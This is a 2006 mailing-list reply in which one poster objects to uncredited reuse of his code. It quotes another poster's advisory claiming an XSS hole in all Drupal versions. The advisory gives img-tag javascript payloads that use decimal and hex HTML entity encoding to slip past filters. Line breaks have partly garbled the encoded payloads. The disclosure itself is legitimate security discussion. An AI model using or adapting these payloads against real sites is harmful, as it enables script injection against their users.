Hi, it would be nice if you could give me some props next time,
as this code is pulled straight from my site. I don't mind if you
re-use it, but just plain ripping code from my site isn't super cool.

On Mon, 2 Jan 2006 liz0 (at) bsdmail (dot) com [email concealed] wrote:

> Drupal all versiyon xss
> ----------------------------------------------------
> site:http://www.drupal.org
>
> Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
> --------------------------------------------------
>
> img tag : on
>
> ------------------------------------------------------------------------
------------------------------------------------------------------------
---------------------
>
> Decimal Value: HTML (without semicolons)
>
> <img src=javascript:alert('XSS')> = <img src=javascript:ale

14t('XSS')>
> ------------------------------------------------------------------------
------------------------------------------------------------------------
---------------
> Decimal Value: HTML (with semicolons)
>
> <img src=javascript:alert('XSS')> = <img src=javascript:al&#x
65rt('XSS')>
>
>
> ------------------------------------------------------------------------
------------------------------------------------------------------------
---------------
> example:
> post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:ale

14t('XSS')> Vulnerable
>
> post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:al&#x
65rt('XSS')> Vulnerable
>
>
> ---------------------------------------------------------
>
> Credit:Liz0ziM
> mail:liz0 (at) bsdmail (dot) com [email concealed]
> www.biyo.tk , www.cehennem.org
>
> Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyb
erlord and all friend
>
> -----------------------------------------------------------
> Source:
>
> http://liz0zim.no-ip.org/drupal.txt
>
> ------------------------------------------------------------
>
>

-R

[ reply ]